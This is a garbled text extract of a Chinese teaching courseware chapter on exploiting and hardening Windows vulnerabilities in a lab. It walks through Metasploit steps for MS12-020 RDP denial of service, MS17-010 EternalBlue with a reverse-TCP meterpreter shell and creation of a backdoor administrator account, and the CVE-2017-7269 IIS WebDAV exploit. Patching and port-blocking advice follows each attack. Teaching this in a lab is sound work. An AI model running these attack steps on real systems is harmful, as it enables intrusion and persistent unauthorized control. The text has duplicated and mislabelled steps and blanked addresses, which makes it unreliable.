




版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
第3章
常見(jiàn)漏洞利用與加固03本章內(nèi)容0102033.1Windows操作系統(tǒng)漏洞3.2Windows服務(wù)漏洞3.3Linunx服務(wù)漏洞013.1Windows操作系統(tǒng)漏洞3.1.1MS12_020漏洞利用與安全加固3.1.1MS12_020漏洞利用與安全加固學(xué)習(xí)目標(biāo)項(xiàng)目分析相關(guān)知識(shí)項(xiàng)目實(shí)例項(xiàng)目實(shí)施項(xiàng)目訓(xùn)練項(xiàng)目評(píng)價(jià)學(xué)習(xí)路徑【學(xué)習(xí)目標(biāo)】1、了解拒絕服務(wù)的原理2、學(xué)會(huì)MS12_020漏洞利用和安全加固的方法3.1.1MS12_020漏洞利用與安全加固【項(xiàng)目分析】
操作系統(tǒng)漏洞是指計(jì)算機(jī)操作系統(tǒng)本身所存在的問(wèn)題或技術(shù)缺陷,是不可避免的,其中拒絕服務(wù)漏洞是一種非常普遍、非常危險(xiǎn)的系統(tǒng)漏洞,在各種操作系統(tǒng)、應(yīng)用軟件中廣泛存在。拒絕服務(wù)是攻擊者向服務(wù)器發(fā)送大量垃圾信息或干擾信息的方式攻擊服務(wù)器,使服務(wù)器無(wú)法正常提供服務(wù),甚至?xí)狗?wù)器癱瘓,一旦操作系統(tǒng)受到這種攻擊就會(huì)有極大的危險(xiǎn),因此在日常的系統(tǒng)維護(hù)中,檢測(cè)拒絕服務(wù)漏洞是一件十分重要的工作。3.1.1MS12_020漏洞利用與安全加固3.1.1MS12_020漏洞利用與安全加固【相關(guān)知識(shí)】
拒絕服務(wù)(DoS)即是攻擊者使目標(biāo)服務(wù)器停止提供服務(wù),是黑客常用的攻擊手段之一,任何對(duì)服務(wù)的干涉,只要能夠?qū)δ繕?biāo)造成麻煩,使某些服務(wù)被暫?;蚴タ捎眯陨踔林鳈C(jī)死機(jī)的均稱(chēng)為拒絕服務(wù)。拒絕服務(wù)攻擊問(wèn)題一直得不到合理的解決,究其原因是因?yàn)榫W(wǎng)絡(luò)協(xié)議本身的安全缺陷,從而拒絕服務(wù)攻擊便成為了攻擊者最常見(jiàn)的攻擊,一般有計(jì)算機(jī)網(wǎng)絡(luò)帶寬攻擊和連通性攻擊。帶寬攻擊指以極大的通信量沖擊網(wǎng)絡(luò),使所有可用網(wǎng)絡(luò)資源都被消耗殆盡,最后導(dǎo)致合法的用戶(hù)請(qǐng)求無(wú)法通過(guò),連通性攻擊是指用大量的連接請(qǐng)求沖擊計(jì)算機(jī),使所有可用的操作系統(tǒng)資源都被消耗殆盡,最終計(jì)算機(jī)無(wú)法再處理合法用戶(hù)的請(qǐng)求。
遠(yuǎn)程桌面協(xié)議(RDP)用于服務(wù)器和客戶(hù)端之間進(jìn)行通信的協(xié)議。通過(guò)使用3389端口上的“終端服務(wù)遠(yuǎn)程桌面協(xié)議(RDP)”和“管理遠(yuǎn)程桌面”的功能可遠(yuǎn)程訪(fǎng)問(wèn)服務(wù)器桌面。MS12_020漏洞原理是攻擊者向目標(biāo)主機(jī)發(fā)送特定的RDP包消耗系統(tǒng)資源,造成操作系統(tǒng)藍(lán)屏崩潰。3.1.1MS12_020漏洞利用與安全加固【項(xiàng)目實(shí)例】
小王是網(wǎng)絡(luò)公司的技術(shù)員,最近他為公司部署了一臺(tái)WindowsServer2003的服務(wù)器,為了確保服務(wù)器的安全,他對(duì)服務(wù)器系統(tǒng)進(jìn)行漏洞滲透測(cè)試,結(jié)果發(fā)現(xiàn)服務(wù)器系統(tǒng)存在遠(yuǎn)程桌面協(xié)議(RDP)遠(yuǎn)程代碼執(zhí)行漏洞,如果攻擊者利用這個(gè)漏洞進(jìn)行遠(yuǎn)程攻擊,可導(dǎo)致服務(wù)器系統(tǒng)藍(lán)屏崩潰,因此他對(duì)這個(gè)漏洞進(jìn)行測(cè)試和加固,以保證系統(tǒng)的安全性。3.1.1MS12_020漏洞利用與安全加固【項(xiàng)目實(shí)施】步驟一
準(zhǔn)備測(cè)試環(huán)境本任務(wù)所使用的計(jì)算機(jī)見(jiàn)下表:編號(hào)操作系統(tǒng)IP地址用途1kali2020攻擊機(jī)2Win2003R2-10靶機(jī)靶機(jī)開(kāi)啟遠(yuǎn)程桌面協(xié)議(RDP)和3389端口,網(wǎng)絡(luò)互連互通。2.使用search搜索可利用的漏洞,輸入“searchms12-020”命令搜索ms12-020漏洞模塊,如圖3-1-2所示,顯示兩個(gè)可利用模塊。漏洞檢測(cè)模塊
auxiliary/scanner/rdp/ms12_020_check漏洞攻擊模塊auxiliary/dos/windows/rdp/ms12_020_maxchannelids步驟二MS12-020漏洞利用1.在KaliLinux終端界面中輸入“msfconsole”命令,打開(kāi)Metasploit框架,如圖3-1-1所示3.使用漏洞檢測(cè)模塊“use
auxiliary/scanner/rdp/ms12_020_check”
,用“showoptions”命令查看配置參數(shù),提示需配置RHOSTIP地址,默認(rèn)端口3389,如圖3-1-3所示圖3-1-3檢測(cè)可利用漏洞4.使用漏洞攻擊模塊“useauxiliary/dos/windows/rdp/ms12_020_maxchannelid”,用“showoptions”命令查看配置參數(shù),如圖3-1-4所示。圖3-1-4使用漏洞攻擊模塊5.設(shè)置靶機(jī)IP地址setrhosts0,輸入run或exploit命令執(zhí)行攻擊;攻擊后提示“Auxiliarymoduleexecutioncompleted”,如圖3-1-5所示,說(shuō)明攻擊完成,此時(shí)目標(biāo)靶機(jī)因受到攻擊則出現(xiàn)藍(lán)屏,如圖3-1-6所示圖3-1-5執(zhí)行攻擊圖3-1-6靶機(jī)受攻擊后藍(lán)屏步驟三加固靶機(jī)漏洞。根據(jù)MS12_020漏洞分析,可以通過(guò)以下幾種方法進(jìn)行系統(tǒng)加固。1.在Windows系統(tǒng)中關(guān)閉遠(yuǎn)程桌面協(xié)議(RemoteDesktopProtocol),不開(kāi)啟遠(yuǎn)程桌面協(xié)議(RemoteDesktopProtocol)。2.禁用如下服務(wù):TerminalServices,RemoteDesktop,RemoteAssistance,WindowsSmallBusinessServer2003RemoteWebWorkplacefeature。3.配置防火墻過(guò)濾向3389端口的請(qǐng)求。4.安裝系統(tǒng)補(bǔ)丁。下面將通過(guò)第1種方法,關(guān)閉遠(yuǎn)程桌面協(xié)議服務(wù)的方法來(lái)加固和驗(yàn)證,步驟如下。1)開(kāi)始→控制面板→系統(tǒng)→遠(yuǎn)程,將“遠(yuǎn)程協(xié)助”和“遠(yuǎn)程桌面”的勾選棄掉,如圖3-1-7所示。2)再次采用前面的步驟五的方法進(jìn)行攻擊測(cè)試,出現(xiàn)RDPService服務(wù)關(guān)閉提示,說(shuō)明系統(tǒng)加固有效,如圖3-1-8所示。圖3-1-7關(guān)閉遠(yuǎn)程桌面功能圖3-1-8攻擊失敗,加固有效根據(jù)項(xiàng)目實(shí)施的步驟,完成MS12_020漏洞利用與安全加固操作,要求能獨(dú)立設(shè)置測(cè)試環(huán)境,進(jìn)行漏洞利用和漏洞加固。3.1.1MS12_020漏洞利用與安全加固【項(xiàng)目訓(xùn)練】3.1.1MS12_020漏洞利用與安全加固【項(xiàng)目評(píng)價(jià)】項(xiàng)目名稱(chēng):MS12_020漏洞利用與安全加固班級(jí):學(xué)號(hào):姓名:日期:評(píng)價(jià)項(xiàng)目評(píng)價(jià)標(biāo)準(zhǔn)分值自評(píng)得分組內(nèi)評(píng)分專(zhuān)業(yè)知識(shí)遠(yuǎn)程桌面協(xié)議(RDP)、3389端口、拒絕服務(wù)10
小組配合漏洞利用與加固測(cè)試20
小組評(píng)價(jià)組員溝通、合作、完成情況10
工作態(tài)度態(tài)度端正,無(wú)無(wú)故缺勤、遲到、早退10
工作質(zhì)量按計(jì)劃完成工作任務(wù)30
協(xié)調(diào)能力與小組成員能合作,協(xié)調(diào)工作10
職業(yè)素質(zhì)實(shí)訓(xùn)過(guò)程認(rèn)真細(xì)致5
創(chuàng)新意識(shí)有獨(dú)立見(jiàn)解,提出獨(dú)特解決問(wèn)題方法5
合計(jì)100
項(xiàng)目名稱(chēng):MS12_020漏洞利用與安全加固評(píng)價(jià)項(xiàng)目分值等級(jí)評(píng)價(jià)對(duì)象(組別)123456成果展示10優(yōu)(9-10)良(8-9)中(6-7)差(1-5)
3.1.1MS12_020漏洞利用與安全加固【任務(wù)拓展】假如不知道靶機(jī)的IP地址,如何利用namp進(jìn)行掃描發(fā)現(xiàn)?請(qǐng)嘗試測(cè)試。嘗試用安裝補(bǔ)丁的方式為漏洞加固并測(cè)試驗(yàn)證效果,補(bǔ)丁名稱(chēng)WindowsServer2003-KB2621440-x86-CHS。謝
謝!第3章
常見(jiàn)漏洞利用與加固03本章內(nèi)容0102033.1Windows操作系統(tǒng)漏洞3.2Windows服務(wù)漏洞3.3Linunx服務(wù)漏洞013.1Windows操作系統(tǒng)漏洞3.1.2
MS17_010漏洞利用與安全加固3.1.2
MS17_010漏洞利用與安全加固學(xué)習(xí)目標(biāo)項(xiàng)目分析相關(guān)知識(shí)項(xiàng)目實(shí)例項(xiàng)目實(shí)施項(xiàng)目訓(xùn)練項(xiàng)目評(píng)價(jià)學(xué)習(xí)路徑【學(xué)習(xí)目標(biāo)】1、了解緩沖區(qū)溢出原理2、學(xué)會(huì)MS17_010漏洞利用與安全加固3.1.2
MS17_010漏洞利用與安全加固【項(xiàng)目分析】
利用緩沖區(qū)溢出攻擊,可以導(dǎo)致程序運(yùn)行失敗、系統(tǒng)宕機(jī)、重新啟動(dòng)等后果,更為嚴(yán)重可以利用它執(zhí)行非授權(quán)指令,甚至可以獲取系統(tǒng)特權(quán)進(jìn)行各種非法操作,因此在日常的系統(tǒng)維護(hù)中,做好緩沖區(qū)溢出漏洞的檢測(cè),關(guān)閉有可能存在風(fēng)險(xiǎn)的服務(wù)和端口十分重要。3.1.2
MS17_010漏洞利用與安全加固3.1.2
MS17_010漏洞利用與安全加固【相關(guān)知識(shí)】緩沖區(qū)溢出(bufferoverflow),是針對(duì)程序設(shè)計(jì)缺陷,向程序輸入緩沖區(qū)寫(xiě)入使之溢出的內(nèi)容,從而破壞程序運(yùn)行、趁中斷之際獲取程序乃至系統(tǒng)的控制權(quán),緩沖區(qū)溢出就好比給程序開(kāi)了個(gè)后門(mén),在當(dāng)前網(wǎng)絡(luò)與分布式系統(tǒng)安全中,遠(yuǎn)程網(wǎng)絡(luò)攻擊的絕大多數(shù)是利用緩沖區(qū)溢出攻擊,利用緩沖區(qū)溢出漏洞實(shí)施的攻擊就是緩沖區(qū)溢出攻擊。SMB(ServerMessageBlock)協(xié)議主要是作為網(wǎng)絡(luò)的通訊協(xié)議,SMB是在會(huì)話(huà)層和表示層以及小部分應(yīng)用層的協(xié)議,通過(guò)SMB協(xié)議可實(shí)現(xiàn)共享網(wǎng)絡(luò)文件、打印等服務(wù),SMB協(xié)議使用139和445端口。445端口可以在局域網(wǎng)中輕松訪(fǎng)問(wèn)各種共享文件夾或共享打印機(jī),但也給網(wǎng)絡(luò)帶來(lái)一定的危險(xiǎn),攻擊者可通過(guò)該端口進(jìn)行攻擊入侵。139端口屬于TCP協(xié)議,NetBIOSFileandPrintSharing進(jìn)入的連接試圖獲得NetBIOS/SMB服務(wù)。這個(gè)協(xié)議被用于Windows“文件和打印機(jī)共享”和SAMBA。MS17_010漏洞俗稱(chēng)“永恒之藍(lán)”,是緩沖區(qū)溢出攻擊的一種,利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限,利用445端口入侵,獲取shell進(jìn)行提權(quán)。3.1.2
MS17_010漏洞利用與安全加固【項(xiàng)目實(shí)例】
網(wǎng)絡(luò)管理員小王請(qǐng)來(lái)專(zhuān)業(yè)人員對(duì)公司的服務(wù)器系統(tǒng)(WindowsServer2008)進(jìn)行漏洞滲透測(cè)試,結(jié)果發(fā)現(xiàn)服務(wù)器系統(tǒng)開(kāi)啟了445端口,并有異常的數(shù)據(jù)包,專(zhuān)業(yè)人員判斷系統(tǒng)存在一定的風(fēng)險(xiǎn),如果攻擊者利用永恒之藍(lán)(EternalBlue)漏洞,向445端口發(fā)送報(bào)文攻擊,獲取系統(tǒng)管理員權(quán)限,以此來(lái)控制公司的服務(wù)器,那么后果不可設(shè)想,因此,必須對(duì)這個(gè)漏洞進(jìn)行測(cè)試和加固,以保證系統(tǒng)的安全性。3.1.2
MS17_010漏洞利用與安全加固【項(xiàng)目實(shí)施】步驟一
準(zhǔn)備測(cè)試環(huán)境本任務(wù)所使用的計(jì)算機(jī)見(jiàn)下表:編號(hào)操作系統(tǒng)IP地址用途1kali2020攻擊機(jī)2Win2003R2-10靶機(jī)靶機(jī)開(kāi)啟445端口,網(wǎng)絡(luò)互連互通。1.在KaliLinux終端界面中輸入“msfconsole”命令,打開(kāi)Metasploit框架,如圖3-1-9所示。步驟二,MS12-020漏洞利用圖3-1-9打開(kāi)Metasploit框架步驟二MS12-020漏洞利用1.在KaliLinux終端界面中輸入“msfconsole”命令,打開(kāi)Metasploit框架,如圖3-1-1所示2.使用search搜索可利用的漏洞,輸入searchms17-010命令搜索ms17-010漏洞,需要用到兩個(gè)功能模塊,如圖3-1-10所示。漏洞掃描模塊
auxiliary/scanner/smb/smb_ms17_010漏洞利用模塊exploit/windows/smb/ms17_010_eternalblue圖3-1-10搜索ms17-010漏洞模塊3.使用漏洞掃描模塊“use
auxiliary/scanner/smb/smb_ms17_010”進(jìn)行漏洞掃描,并用showoptions命令顯示配置參數(shù),如圖3-1-11所示。圖3-1-11
漏洞掃描模塊配置參數(shù)4.使用漏洞利用模塊“useexploit/windows/smb/ms17_010_eternalblue”進(jìn)行漏洞攻擊,用showoptions命令顯示配置參數(shù),如圖3-1-12所示。圖3-1-12顯示漏洞攻擊信息5.設(shè)置攻擊載荷payload、攻擊目標(biāo)、監(jiān)聽(tīng)主機(jī)參數(shù),這里采用TCP的meterpreter反彈載荷,如圖3-1-13所示。設(shè)置攻擊載荷:setpayloadwindows/x64/meterpreter/reverse_tcp設(shè)置攻擊目標(biāo)(靶機(jī)):setrhost
0設(shè)置監(jiān)聽(tīng)主機(jī)(kali):setlhost圖3-1-13
設(shè)置攻擊載荷參數(shù)輸入run或exploit命令開(kāi)始攻擊,可以看到監(jiān)聽(tīng)主機(jī):4444與靶機(jī)0:49159之間已經(jīng)建立了連接,然后反彈回meterpreter,如圖3-1-14所示。圖3-1-14
執(zhí)行攻擊6.用sysinfo命令顯示遠(yuǎn)程主機(jī)系統(tǒng)信息,用screenshot命令對(duì)遠(yuǎn)程主機(jī)當(dāng)前屏幕進(jìn)行截圖,并保存至攻擊機(jī)/root目錄下,如圖3-1-15至3-1-17所示。圖3-1-16對(duì)遠(yuǎn)程主機(jī)當(dāng)前屏幕進(jìn)行截圖圖3-1-15顯示遠(yuǎn)程主機(jī)系統(tǒng)信息圖3-1-17截圖保存至攻擊機(jī)/root目錄下7.輸入shell命令獲取shell控制臺(tái),當(dāng)轉(zhuǎn)到C:\Windows\system32目錄下,說(shuō)明已經(jīng)獲得了shell的控制權(quán),如圖3-1-18所示圖3-1-19查看用戶(hù)信息8.用命令netuser查看系統(tǒng)用戶(hù)信息,當(dāng)前顯示只有系統(tǒng)只有Administrator、Guest兩個(gè)用戶(hù),如圖3-1-19所示9.用netusertestPass@123/add命令遠(yuǎn)程創(chuàng)建一個(gè)用戶(hù)test,密碼Pass@123,用netuser命令查看系統(tǒng)用戶(hù)信息,發(fā)現(xiàn)多了一個(gè)用戶(hù)test,如圖3-1-20所示,再用netlocalgroupAdministratorstest/add命令將用戶(hù)test加入管理員組,使test用戶(hù)具有管理員權(quán)限,達(dá)到提權(quán)的目的,用netlocalgroupAdministrators命令查看Administraots管理員組的成員已有test用戶(hù),攻擊者已獲取了遠(yuǎn)程靶機(jī)管理員權(quán)限。如圖3-1-21所示。圖3-1-20新建用戶(hù)并查看結(jié)果9.用netusertestPass@123/add命令遠(yuǎn)程創(chuàng)建一個(gè)用戶(hù)test,密碼Pass@123,用netuser命令查看系統(tǒng)用戶(hù)信息,發(fā)現(xiàn)多了一個(gè)用戶(hù)test,如圖3-1-20所示,再用netlocalgroupAdministratorstest/add命令將用戶(hù)test加入管理員組,使test用戶(hù)具有管理員權(quán)限,達(dá)到提權(quán)的目的,用netlocalgroupAdministrators命令查看Administraots管理員組的成員已有test用戶(hù),攻擊者已獲取了遠(yuǎn)程靶機(jī)管理員權(quán)限。如圖3-1-21所示。圖3-1-20新建用戶(hù)并查看結(jié)果圖3-1-21將用戶(hù)添加入管理員組步驟三,MS12-020漏洞利用驗(yàn)證1.為驗(yàn)證test用戶(hù)添加的作用,用rungetgui–e命令在msf開(kāi)啟遠(yuǎn)程桌面,然后操作攻擊機(jī)遠(yuǎn)程桌面靶機(jī)服務(wù)器,使用新添加的test用戶(hù)登陸,如圖3-1-22所示。圖3-1-22用rungetgui–e命令在msf開(kāi)啟遠(yuǎn)程桌面2.在kali新開(kāi)一個(gè)終端,用rdesk0連接遠(yuǎn)程桌面,隨后彈出連接界面,用test用戶(hù)和密碼Pass@123登陸,成功登陸后查看用戶(hù)屬性時(shí),發(fā)現(xiàn)用戶(hù)已是管理員組成員,證明利用成功,如圖3-1-23至3-1-25所示。圖3-1-23用rdesk遠(yuǎn)程連接圖3-1-24用test用戶(hù)和密碼Pass@123登陸圖3-1-25查看test用戶(hù)屬性步驟四,MS17-010漏洞利用加固對(duì)于MS17_010漏洞要考慮從內(nèi)網(wǎng)和外網(wǎng)兩個(gè)網(wǎng)絡(luò)環(huán)境進(jìn)行防御加固,內(nèi)網(wǎng)要做好系統(tǒng)補(bǔ)丁管理工作,防止系統(tǒng)運(yùn)行惡意軟件,及時(shí)做好補(bǔ)丁更新,外網(wǎng)要做好防火墻的設(shè)置規(guī)則,關(guān)閉端口445,135,137,138,139,及時(shí)下載安裝更新補(bǔ)丁。根據(jù)項(xiàng)目實(shí)施的步驟,完成MS17_010漏洞利用與安全加固;填寫(xiě)以下項(xiàng)目訓(xùn)練節(jié)點(diǎn)的名稱(chēng)或參數(shù)。3.1.2
MS17_010漏洞利用與安全加固【項(xiàng)目訓(xùn)練】項(xiàng)目名稱(chēng)項(xiàng)目節(jié)點(diǎn)節(jié)點(diǎn)參數(shù)設(shè)置實(shí)驗(yàn)環(huán)境1、配置攻擊機(jī)IP地址
2、配置靶機(jī)IP地址
3、掃描測(cè)試端口
3、測(cè)試網(wǎng)絡(luò)互聯(lián)互通
漏洞利用1、設(shè)置掃描模塊
2、設(shè)置攻擊模塊
3、設(shè)置靶機(jī)、監(jiān)聽(tīng)機(jī)IP
4、對(duì)遠(yuǎn)程主機(jī)當(dāng)前屏幕進(jìn)行截圖
5、創(chuàng)建用戶(hù)并加入管理員組
漏洞利用在msf開(kāi)啟遠(yuǎn)程桌面
連接遠(yuǎn)程桌面
登陸遠(yuǎn)程桌面
查看用戶(hù)屬性
漏洞加固
關(guān)閉139、445端口
安裝更新補(bǔ)丁
3.1.2
MS17_010漏洞利用與安全加固【項(xiàng)目評(píng)價(jià)】項(xiàng)目名稱(chēng):MS17_010漏洞利用與安全加固班級(jí):學(xué)號(hào):姓名:日期:評(píng)價(jià)項(xiàng)目評(píng)價(jià)標(biāo)準(zhǔn)分值自評(píng)得分組內(nèi)評(píng)分專(zhuān)業(yè)知識(shí)緩沖區(qū)溢出、SMB協(xié)議、445端口10
小組配合漏洞利用與加固測(cè)試20
小組評(píng)價(jià)組員溝通、合作、完成情況10
工作態(tài)度態(tài)度端正,無(wú)無(wú)故缺勤、遲到、早退10
工作質(zhì)量按計(jì)劃完成工作任務(wù)30
協(xié)調(diào)能力與小組成員能合作,協(xié)調(diào)工作10
職業(yè)素質(zhì)實(shí)訓(xùn)過(guò)程認(rèn)真細(xì)致5
創(chuàng)新意識(shí)有獨(dú)立見(jiàn)解,提出獨(dú)特解決問(wèn)題方法5
合計(jì)100
項(xiàng)目名稱(chēng):MS17_010漏洞利用與安全加固評(píng)價(jià)項(xiàng)目分值等級(jí)評(píng)價(jià)對(duì)象(組別)123456成果展示10優(yōu)(9-10)良(8-9)中(6-7)差(1-5)
3.1.2
MS12_020漏洞利用與安全加固【任務(wù)拓展】假如不知道靶機(jī)的IP地址,如何利用namp進(jìn)行掃描發(fā)現(xiàn)?請(qǐng)嘗試測(cè)試。嘗試用安裝補(bǔ)丁的方式為漏洞加固并測(cè)試驗(yàn)證效果,補(bǔ)丁名稱(chēng)WindowsServer2003-KB2621440-x86-CHS。謝
謝!第3章
常見(jiàn)漏洞利用與加固03本章內(nèi)容0102033.1Windows操作系統(tǒng)漏洞3.2Windows服務(wù)漏洞3.3Linunx服務(wù)漏洞023.2Windows服務(wù)漏洞3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制學(xué)習(xí)目標(biāo)項(xiàng)目分析相關(guān)知識(shí)項(xiàng)目實(shí)例項(xiàng)目實(shí)施項(xiàng)目訓(xùn)練項(xiàng)目評(píng)價(jià)學(xué)習(xí)路徑【學(xué)習(xí)目標(biāo)】1.了解Windows服務(wù)漏洞2.能復(fù)現(xiàn)CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制【項(xiàng)目分析】
Windows服務(wù)漏洞是指Windows操作系統(tǒng)提供的某項(xiàng)服務(wù)所存在的問(wèn)題或技術(shù)缺陷,是不可避免的,但漏洞有可能受攻擊者利用和攻擊,給用戶(hù)造成不可預(yù)估的風(fēng)險(xiǎn)。CVE-2017-7269漏洞屬于Windows服務(wù)漏洞的一種。在早期IIS6.0和WindowsServer2003為網(wǎng)絡(luò)服務(wù)器提供完整的解決方案,在網(wǎng)絡(luò)應(yīng)用服務(wù)器的管理和安全性與可擴(kuò)展性方面提供了許多新的功能,但隨著網(wǎng)絡(luò)技術(shù)發(fā)展和變化,IIS6.0開(kāi)啟WebDAV服務(wù)后被爆存在緩存區(qū)溢出漏洞導(dǎo)致遠(yuǎn)程代碼執(zhí)行。3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制【相關(guān)知識(shí)】CVE-2017-7269漏洞目前針對(duì)WindowsServer2003R2可以穩(wěn)定利用。該漏洞由華南理工大學(xué)信息安全實(shí)驗(yàn)室計(jì)算機(jī)科學(xué)與工程學(xué)院人員ZhiniangPeng和ChenWu發(fā)現(xiàn),最早在2016年7,8月份開(kāi)始被利用。WebDAV(Web-basedDistributedAuthoringandVersioning)是一種基于HTTP1.1協(xié)議的通信協(xié)議。它擴(kuò)展了HTTP1.1在GET、POST、HEAD等幾個(gè)HTTP標(biāo)準(zhǔn)方法以外添加了一些新的方法,使應(yīng)用程序可對(duì)WebServer直接讀寫(xiě),并支持寫(xiě)文件鎖定(Locking)及解鎖(Unlock),還可以支持文件的版本控制。3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制【項(xiàng)目實(shí)例】
網(wǎng)絡(luò)管理員小王,請(qǐng)來(lái)專(zhuān)業(yè)人員對(duì)公司的服務(wù)器系統(tǒng)WindowsServer2003進(jìn)行漏洞滲透測(cè)試,發(fā)現(xiàn)服務(wù)器系統(tǒng)的IIS可能存在WebDAV服務(wù)漏洞,也就是編號(hào)為CVE-2017-7269的緩沖區(qū)溢出漏洞,這個(gè)漏洞屬高危等級(jí),為確保服務(wù)器安全,小王對(duì)這個(gè)漏洞進(jìn)行測(cè)試和加固。3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制【項(xiàng)目實(shí)施】步驟一
準(zhǔn)備測(cè)試環(huán)境本任務(wù)所使用的計(jì)算機(jī)見(jiàn)下表:編號(hào)操作系統(tǒng)IP地址用途1kali2020攻擊機(jī)2Win2003R2-10靶機(jī)靶機(jī)允許WebDAV服務(wù),如圖3-2-1所示,啟用80端口,網(wǎng)絡(luò)互連互通。2.使用search搜索可利用的漏洞,輸入“searchms12-020”命令搜索ms12-020漏洞模塊,如圖3-1-2所示,顯示兩個(gè)可利用模塊。漏洞檢測(cè)模塊
auxiliary/scanner/rdp/ms12_020_check漏洞攻擊模塊auxiliary/dos/windows/rdp/ms12_020_maxchannelids步驟二CVE-2017-7269漏洞利用設(shè)置1.在KaliLinux終端界面中輸入“msfconsole”命令,打開(kāi)Metasploit框架,如圖3-2-2所示。圖3-2-2打開(kāi)Metasploit框架2.使用search搜索可利用的漏洞,輸入“searchcve-2017-7269”命令搜索cve-2017-7269漏洞模塊,發(fā)現(xiàn)只顯示“exploit/windows/iis/iis_webdav_scstoragepathfromurl”可利用漏洞模塊,沒(méi)有顯示“exploit/windows/iis/cve_2017_7269”,但不影響后面的操作,如圖3-2-3所示。圖3-2-3搜索cve-2017-7269模塊3.使用“useexploit/windows/iis/cve_2017_7269”啟用漏洞利用模塊,用showoptions命令顯示配置參數(shù),提示需要配置HttpHost和RHOSTS主機(jī)IP地址,默認(rèn)端口80,可利用漏洞系統(tǒng)為WindowsServer2003R2,如圖3-2-4所示。圖3-2-4檢測(cè)可利用漏洞4.根據(jù)配置參數(shù)設(shè)置攻擊載荷、攻擊目標(biāo)和監(jiān)聽(tīng)主機(jī)參數(shù),如圖3-2-5所示。設(shè)置攻擊載荷:setpayloadwindows/meterpreter/reverse_tcp設(shè)置HttpHost目標(biāo):setHttphost0設(shè)置攻擊目標(biāo)(靶機(jī)):setrhosts
0設(shè)置監(jiān)聽(tīng)主機(jī)(kali):setlhosts圖3-2-5設(shè)置攻擊載荷5.用showoptions命令查看最終配置參數(shù),如圖3-2-6所示。圖3-2-6所示查看配置參數(shù)6.輸入run或exploit命令開(kāi)始攻擊,隨后反彈meterpreter,如圖3-2-7所示7.輸入shell命令獲取shell控制臺(tái),當(dāng)轉(zhuǎn)到c:\windows\system32\inetsrv>提示符時(shí),說(shuō)明已經(jīng)獲得了shell的控制權(quán),隨后可以進(jìn)行相關(guān)的滲透操作。如圖3-2-8所示。如圖3-2-7攻擊成功反彈meterpreter圖3-2-8獲shell的控制權(quán)步驟三漏洞加固
1.針對(duì)cve_2017_7269漏洞的修復(fù)方法是禁用WebDAV,在IIS信息服務(wù)管理器中找到Web服務(wù)擴(kuò)展禁止WebDAV服務(wù),如圖3-2-9所示。圖3-2-9禁止WebDAV服務(wù)根據(jù)項(xiàng)目實(shí)施的步驟,完成MS12_020漏洞利用與安全加固操作,要求能獨(dú)立設(shè)置測(cè)試環(huán)境,進(jìn)行漏洞利用和漏洞加固。3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制【項(xiàng)目訓(xùn)練】3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制【項(xiàng)目評(píng)價(jià)】項(xiàng)目名稱(chēng):CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制班級(jí):學(xué)號(hào):姓名:日期:評(píng)價(jià)項(xiàng)目評(píng)價(jià)標(biāo)準(zhǔn)分值自評(píng)得分組內(nèi)評(píng)分專(zhuān)業(yè)知識(shí)Windows服務(wù)漏洞、CVE-2017-7269漏洞、WebDAV服務(wù)。10
小組配合漏洞利用與加固測(cè)試20
小組評(píng)價(jià)組員溝通、合作、完成情況10
工作態(tài)度態(tài)度端正,無(wú)無(wú)故缺勤、遲到、早退10
工作質(zhì)量按計(jì)劃完成工作任務(wù)30
協(xié)調(diào)能力與小組成員能合作,協(xié)調(diào)工作10
職業(yè)素質(zhì)實(shí)訓(xùn)過(guò)程認(rèn)真細(xì)致5
創(chuàng)新意識(shí)有獨(dú)立見(jiàn)解,提出獨(dú)特解決問(wèn)題方法5
合計(jì)100
項(xiàng)目名稱(chēng):CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制評(píng)價(jià)項(xiàng)目分值等級(jí)評(píng)價(jià)對(duì)象(組別)123456成果展示10優(yōu)(9-10)良(8-9)中(6-7)差(1-5)
3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制【任務(wù)拓展】嘗試用設(shè)置防火墻的方式加固系統(tǒng)漏洞。謝
謝!第3章
常見(jiàn)漏洞利用與加固03本章內(nèi)容0102033.1Windows操作系統(tǒng)漏洞3.2Windows服務(wù)漏洞3.3Linunx服務(wù)漏洞023.2Windows服務(wù)漏洞3.2.1利用CVE-2017-7269漏洞滲透IIS6.0實(shí)現(xiàn)遠(yuǎn)程控制3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行學(xué)習(xí)目標(biāo)項(xiàng)目分析相關(guān)知識(shí)項(xiàng)目實(shí)例項(xiàng)目實(shí)施項(xiàng)目訓(xùn)練項(xiàng)目評(píng)價(jià)學(xué)習(xí)路徑【學(xué)習(xí)目標(biāo)】1、了解LINK文件遠(yuǎn)程代碼執(zhí)行漏洞。2、利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文